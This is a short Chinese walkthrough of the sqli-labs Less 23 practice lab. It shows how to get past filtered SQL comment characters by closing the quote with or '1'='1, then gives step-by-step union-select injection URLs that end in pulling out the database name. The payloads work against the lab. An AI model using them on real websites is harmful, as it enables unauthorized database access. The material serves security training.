小课堂 -- 绕过去除注释符(Get)

简介: 小课堂 -- 绕过去除注释符(Get)

环境sqli-labs

 

less 23

1、输入?id=1,正常运行

image.png

 

2、输入特殊字符报错

image.png

 

3、单引号闭合,但是发现# --+等都被过滤了

image.png

 

4、使用下面代码闭合

192.168.1.121/sqli/less-23?id=1' or '1'='1

 

5、用union select判断字段数

192.168.1.121/sqli/less-23?id=1' union select 1,2,3 or '1'='1

 

6、让id报错,union select生效

192.168.1.121/sqli/less-23?id=-1' union select 1,2,3 or '1'='1

image.png

 

7、获取数据库名称

192.168.1.121/sqli/less-23?id=-1' union select 1,database(),3 or '1'='1

image.png

 

 

 

禁止非法,后果自负

 

目录
相关文章
|
9月前
|
JavaScript 前端开发 开发者
正则表达式深度解析:斜杠的妙用
【2月更文挑战第29天】
1253 0
正则表达式深度解析:斜杠的妙用
|
9月前
|
数据库
19、绕过去除注释符(Get)
19、绕过去除注释符(Get)
32 0
|
9月前
|
SQL 数据库
小课堂 -- 绕过去除特殊字符的sql注入
小课堂 -- 绕过去除特殊字符的sql注入
66 0
|
4月前
|
Shell 网络安全 数据库
sqlmap过滤连续空格的方法(二)
sqlmap过滤连续空格的方法(二)
|
4月前
|
数据库
sqlmap过滤连续空格的方法(一)
sqlmap过滤连续空格的方法(一)
|
9月前
如何去掉字符串中文括号及其内部的内容三种方式
如何去掉字符串中文括号及其内部的内容三种方式
337 0
|
9月前
|
C语言 C++
每天一道C语言编程:(去掉:双斜杠注释,去掉空格)
每天一道C语言编程:(去掉:双斜杠注释,去掉空格)
66 0
|
9月前
|
人工智能 自然语言处理 Java
想要搞定正则验证字串符?用这个办法最简单,质量还高!
在编程中,字符串的处理是不可避免的一部分。我们经常需要验证用户输入的数据、提取文本信息、替换特定字符等等。在这些场景中,正则验证字串符(Regex Validation)为我们提供了一种高效、灵活的处理方式。
|
开发者 Perl
正则表达式中的模式修正符S和M 妙用!
教你如何正确使用正则表达式中的模式修正符S和M!
84 0
正则表达式中的模式修正符S和M 妙用!